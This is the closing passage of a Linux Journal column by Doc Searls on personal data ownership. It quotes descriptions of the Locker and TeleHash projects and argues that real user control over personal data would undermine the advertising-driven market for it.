Of the former, they say, “A Locker gives people ownership over their personal data and clear control over how it’s protected and shared. Providing flexible APIs for access to that data, Lockers are a powerful way for developers to build applications that leverage rich personal data.” It’s “licensed under the three-clause BSD License” and “primarily developed using node.js, with a bit of Python to facilitate some integration points.
We use npm to help manage internal system dependencies, and we try to follow TDD/BDD as enthusiastically as our time will allow.”

TeleHash “works by sending and receiving small bits of JSON via UDP using an efficient routing system based on Kademlia, a proven and popular Distributed Hash Table. Everything within TeleHash is routed based on a generic SHA hash of the related id or URL.”

Okay, back to the personal data marketplace. While there are well-meaning efforts on the government side, such as “do not track” legislation proposed in the US and the “Midata”
initiative by the UK government (promising to return control of personal data to citizens by the government and encouraging businesses to do the same), nothing I’ve brought up so far visits the possibility that personal data—that you own and control—is not by nature either a fungible asset or something that you would want to sell to anybody.

In other words, if all of us actually had full control of data about us, there might not be a market for personal data at all. There would simply be all the other markets we know—for goods and services we buy and sell. We might disclose some data on a permitted-use basis, such as most of us do every day using credit cards. But that’s not the same as selling data as an “asset”.

The only reason we’re talking about personal data as an “asset” is that the advertising marketplace—in which we are the product being sold, rather than the buyer or the seller—treats it like that. Once we get real control, however, that market will be in real trouble. Advertising will still be fine. Robotic bad manners will not.■

Doc Searls is Senior Editor of Linux Journal.
He is also a fellow with the Berkman Center for Internet and Society at Harvard University and the Center for Information Technology and Society at UC Santa Barbara.